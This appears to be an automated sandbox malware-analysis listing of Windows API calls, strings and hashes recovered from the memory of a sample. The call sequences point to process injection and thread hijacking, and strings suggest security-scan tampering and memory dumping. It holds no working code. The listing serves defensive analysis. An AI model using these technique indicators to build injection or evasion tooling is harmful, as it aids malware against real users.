• Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
• Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
Yara matches
Similarity
• API ID: AddressProc$HandleModule
• String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
• API String ID: 667068680-597814768
• Opcode ID: 126516cfb07fd1bb43ee79f5e60cf8beb8e354d148de608bbf4cac96dbae183d
• Instruction ID: 8ffabe5e7b949616eac3607476c594507289cebbbf77df22501c12b41831dd18
• Opcode Fuzzy Hash: 126516cfb07fd1bb43ee79f5e60cf8beb8e354d148de608bbf4cac96dbae183d
• Instruction Fuzzy Hash: 3131CCB5A80290EFFF02EBA4E8A5A1977E9EB55741B000DA5E401DF308EB74ED14CF65
APIs
  • Part of subcall function 02D489D0: FreeLibrary.KERNEL32(74FA0000,00000000,00000000,00000000,00000000,02DB738C,Function_0000662C,00000004,02DB739C,02DB738C,05F5E103,00000040,02DB73A0,74FA0000,00000000,00000000), ref: 02D48AAA
  • Part of subcall function 02D48788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02D48814
• GetThreadContext.KERNEL32(00000000,02DB7424,ScanString,02DB73A8,02D4A93C,UacInitialize,02DB73A8,02D4A93C,ScanBuffer,02DB73A8,02D4A93C,ScanBuffer,02DB73A8,02D4A93C,UacInitialize,02DB73A8), ref: 02D49602
  • Part of subcall function 02D47A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02D47A9F
  • Part of subcall function 02D47D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02D47DEC
• SetThreadContext.KERNEL32(00000000,02DB7424,ScanBuffer,02DB73A8,02D4A93C,ScanString,02DB73A8,02D4A93C,Initialize,02DB73A8,02D4A93C,00000000,-00000008,02DB74FC,00000004,02DB7500), ref: 02D4A317
• NtResumeThread.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,02DB7424,ScanBuffer,02DB73A8,02D4A93C,ScanString,02DB73A8,02D4A93C,Initialize,02DB73A8,02D4A93C,00000000,-00000008,02DB74FC), ref: 02D4A324
  • Part of subcall function 02D4894C: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,02DB73A8,02D4A587,ScanString,02DB73A8,02D4A93C,ScanBuffer,02DB73A8,02D4A93C,Initialize,02DB73A8,02D4A93C,UacScan), ref: 02D48960
  • Part of subcall function 02D4894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02D4897A
  • Part of subcall function 02D4894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,02DB73A8,02D4A587,ScanString,02DB73A8,02D4A93C,ScanBuffer,02DB73A8,02D4A93C,Initialize), ref: 02D489B6
Strings
Memory Dump Source
• Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
• Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
Yara matches
Similarity
• API ID: LibraryThread$ContextFreeMemoryVirtual$AddressAllocateCreateLoadProcProcessResumeUserWrite
• String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
• API String ID: 2624078988-51457883
• Opcode ID: ee77f1746cbf5b353b15b39d6d99e4dc63a676b503af63a2dae5b401e0e07b9b
• Instruction ID: 9c7a37cb6e565cd48caa4e209dfd9b27c2f634151c48eea35c90db35b36d2102
• Opcode Fuzzy Hash: ee77f1746cbf5b353b15b39d6d99e4dc63a676b503af63a2dae5b401e0e07b9b
• Instruction Fuzzy Hash: 2CE22E35A415589BDB52FB64EC90BCFB3BAEF89300F5041A6E009AB314DE34AE55CF61
APIs
  • Part of subcall function 02D489D0: FreeLibrary.KERNEL32(74FA0000,00000000,00000000,00000000,00000000,02DB738C,Function_0000662C,00000004,02DB739C,02DB738C,05F5E103,00000040,02DB73A0,74FA0000,00000000,00000000), ref: 02D48AAA
  • Part of subcall function 02D48788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02D48814
• GetThreadContext.KERNEL32(00000000,02DB7424,ScanString,02DB73A8,02D4A93C,UacInitialize,02DB73A8,02D4A93C,ScanBuffer,02DB73A8,02D4A93C,ScanBuffer,02DB73A8,02D4A93C,UacInitialize,02DB73A8), ref: 02D49602
  • Part of subcall function 02D47A2C: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 02D47A9F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
• Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
Yara matches
Similarity
• API ID: AllocateContextCreateFreeLibraryMemoryProcessThreadUserVirtual
• String ID: BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$I_QueryTagInformation$Initialize$MiniDumpReadDumpStream$MiniDumpWriteDump$NtOpenObjectAuditAlarm$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$OpenSession$SLGetLicenseInformation$ScanBuffer$ScanString$UacInitialize$UacScan$advapi32$bcrypt$dbgcore$ntdll$sppc
• API String ID: 4276370345-51457883
• Opcode ID: 9d83b9276b10ccb2b4bc841b63a2248d22a966e13c28c1ed9c1fb098f6631035
• Instruction ID: 4a597db9b30d8218a89863bbfd9e5993f6e25ffc0b6e531dfe745e2dbb6b3d20
• Opcode Fuzzy Hash: 9d83b9276b10ccb2b4bc841b63a2248d22a966e13c28c1ed9c1fb098f6631035
• Instruction Fuzzy Hash: C8E22F35A415589BDB12FB64EC90BCFB3BAEF89300F5041A6E049AB314DE34AE55CF61
APIs
• GetModuleHandleA.KERNEL32(kernel32.dll,02D3737C,02D30000,02D5E790), ref: 02D35925
• GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02D3593C
• lstrcpynA.KERNEL32(?,?,?), ref: 02D3596C
• lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02D3737C,02D30000,02D5E790), ref: 02D359D0
• lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02D3737C,02D30000,02D5E790), ref: 02D35A06
• FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02D3737C,02D30000,02D5E790), ref: 02D35A19
• FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02D3737C,02D30000,02D5E790), ref: 02D35A2B
• lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02D3737C,02D30000,02D5E790), ref: 02D35A37
• lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02D3737C,02D30000), ref: 02D35A6B
• lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02D3737C), ref: 02D35A77
• lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02D35A99
Strings
Memory Dump Source
• Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
• Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
Yara matches
Similarity
• API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
• String ID: GetLongPathNameA$\$kernel32.dll
• API String ID: 3245196872-1565342463
• Opcode ID: 1d9c244a4fdac334c44ecb9d9f9b41949a716c92c01b26bad1483609baf7bd6d
• Instruction ID: 7ff60fdceeb6618fd90ac1db06b4aef8081b15994eb9d4dd2140a3101116db2c
• Opcode Fuzzy Hash: 1d9c244a4fdac334c44ecb9d9f9b41949a716c92c01b26bad1483609baf7bd6d
• Instruction Fuzzy Hash: 1E416D71D0021AABDB12DAE8DC88ADEB7BDEB09340F4445A5E548E7341E770EE44CFA0
APIs
• lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02D35BE8
• GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02D35BF5
• GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02D35BFB
• lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02D35C26
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02D35C6D
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02D35C7D
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02D35CA5
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02D35CB5
• lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02D35CDB
• LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02D35CEB
Strings
Memory Dump Source
• Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
• Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
Yara matches
Similarity
• API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
• String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
• API String ID: 1599918012-2375825460
                                                                                                                        • Opcode ID: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                                                                        • Instruction ID: a38ec1fe555bbd654b3abce7599cc8427f6a9f0c89f8ae02c13ca906bbdaf560
                                                                                                                        • Opcode Fuzzy Hash: 8b0727ff8eacdafd1fa5d25497bf18fe7d1f96c39f01eed16574b8fc4031b0a7
                                                                                                                        • Instruction Fuzzy Hash: 4631C776E0026D2AEB27D6B4DC46FDE77AD9B04384F4441E19608E6281D774DF84CF60
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6f628971186b7869ff55a994468a376647b4631b563bdc3b7b4e6f267e50c07e
                                                                                                                        • Instruction ID: 2c6e458df31f32518bebd5361ba0d330b3acd79e1ed32170c3f554ffe75a4988
                                                                                                                        • Opcode Fuzzy Hash: 6f628971186b7869ff55a994468a376647b4631b563bdc3b7b4e6f267e50c07e
                                                                                                                        • Instruction Fuzzy Hash: CD021C71E002199BDF54CFA9D8807AEBBF2EF88314F158269D919E7380D731AE41CB95
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __floor_pentium4
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4168288129-0
                                                                                                                        • Opcode ID: c9424e6ecc37e7eae514543f3a9fb24970c65604282ac3aa02e964e22bbdf43c
                                                                                                                        • Instruction ID: 00399ee90f6e53a111f05170b35653705e14e4784720e829681531571e9c3c10
                                                                                                                        • Opcode Fuzzy Hash: c9424e6ecc37e7eae514543f3a9fb24970c65604282ac3aa02e964e22bbdf43c
                                                                                                                        • Instruction Fuzzy Hash: 04C22A71E446288FDB25CE289D807EAB7B5FB44309F1591EAD54DE7280E774AEC28F40
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 0-4108050209
                                                                                                                        • Opcode ID: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
                                                                                                                        • Instruction ID: 21397b150afef2e49d2f00704baabffd9fd2553787cd287d8d09a86fac37d673
                                                                                                                        • Opcode Fuzzy Hash: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
                                                                                                                        • Instruction Fuzzy Hash: 340272327093008BDB14EF29D861A6FF3E2EFC8714F15492DF586AB380DA74AD458A56
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: >G
                                                                                                                        • API String ID: 0-1296849874
                                                                                                                        • Opcode ID: d44b3566b9965a168e2b8c107c39c002a270cdccbaa5276ec947d3761fa4e4a6
                                                                                                                        • Instruction ID: 17dd3c5df6a13d9586ec86044df29e45167c2ed7eecdfb45fba0b65acfec34a6
                                                                                                                        • Opcode Fuzzy Hash: d44b3566b9965a168e2b8c107c39c002a270cdccbaa5276ec947d3761fa4e4a6
                                                                                                                        • Instruction Fuzzy Hash: ADB1E671E04285EBCB05FB748CB5AEE769ADF50700F90452DEA47933D4EE649E048EB2
                                                                                                                        APIs
                                                                                                                        • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02D37FF5
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DiskFreeSpace
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1705453755-0
                                                                                                                        • Opcode ID: c3e0a068419184d7cdb4846bb4635073bd8f3b1816a615b6fba0b6092501f7fc
                                                                                                                        • Instruction ID: 19bc4cb3cafdec4c004d7e299484ca893c3014fefba015642466dc28793dcc02
                                                                                                                        • Opcode Fuzzy Hash: c3e0a068419184d7cdb4846bb4635073bd8f3b1816a615b6fba0b6092501f7fc
                                                                                                                        • Instruction Fuzzy Hash: 2B11BEB5A01209AF9B05CF99C8819AFF7F9FFC8300F54C569A505E7254E6719E018BA0
                                                                                                                        APIs
                                                                                                                        • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02D3A7E2
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: InfoLocale
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2299586839-0
                                                                                                                        • Opcode ID: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                                                                        • Instruction ID: 646feb6555ddfec8225e534e52993375be2641c2b329933cc077e5275030be9b
                                                                                                                        • Opcode Fuzzy Hash: e4a4f5238fe2b89d356e7e49d78e4b786299a6a1796c12883d610745802d8045
                                                                                                                        • Instruction Fuzzy Hash: BFE0D873B0021427D312A558DC80EF6735DDB58710F0042BABE45C7385EDE4DE804AF8
                                                                                                                        APIs
                                                                                                                        • GetVersionExA.KERNEL32(?,02D5D106,00000000,02D5D11E), ref: 02D3B79A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Version
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1889659487-0
                                                                                                                        • Opcode ID: a159cd78ac7fc2caba8035194fce67f9a3066b832ef624f0f1322c455005e301
                                                                                                                        • Instruction ID: f54f602ebc2ab332752ff59892df08a3357b900674b03ada858f31e5ea8f3bbd
                                                                                                                        • Opcode Fuzzy Hash: a159cd78ac7fc2caba8035194fce67f9a3066b832ef624f0f1322c455005e301
                                                                                                                        • Instruction Fuzzy Hash: 3EF034B4904311AFD340EF28D440A167BE9FB48704F008D29EA98C7380E7B8DE18DFA2
                                                                                                                        APIs
                                                                                                                        • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,02D3BE72,00000000,02D3C08B,?,?,00000000,00000000), ref: 02D3A823
Memory Dump Source
• Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
• Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
Yara matches
Similarity
• API ID: InfoLocale
• String ID:
• API String ID: 2299586839-0
• Opcode ID: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
• Instruction ID: d9a90bccd35d7d6353b7ec3cb3a01c54fda5cd109f57aa0b0820030c9ab08e3e
• Opcode Fuzzy Hash: d4400675b37800bae6f97b663feac51f5f6a0a7098a31e52e30e5399d422cbaa
• Instruction Fuzzy Hash: 11D05EA630E2A03AA215915AAD84D7B5ADCCAC67A1F00407ABAC8C6341D200CC07DAB1
APIs
Memory Dump Source
• Source File: 00000000.00000002.2268216794.0000000002D31000.00000020.00001000.00020000.00000000.sdmp, Offset: 02D30000, based on PE: true
• Associated: 00000000.00000002.2268192586.0000000002D30000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268329674.0000000002D5E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002DB7000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002E2D000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAB000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.2268573448.0000000002EAE000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2d30000_jW3NEKvxH1.jbxd
Yara matches
Similarity
• API ID: LocalTime
• String ID:
• API String ID: 481472006-0
• Opcode ID: 2011951a752d329e78ca378c5827ecb81dc4292a3beff4a2dc5c32cf1b86488c
• Instruction ID: f0dedce113afc6da29659b2df8e6dda3abfe0e58ae0c3ab02d511e10642d4c3b
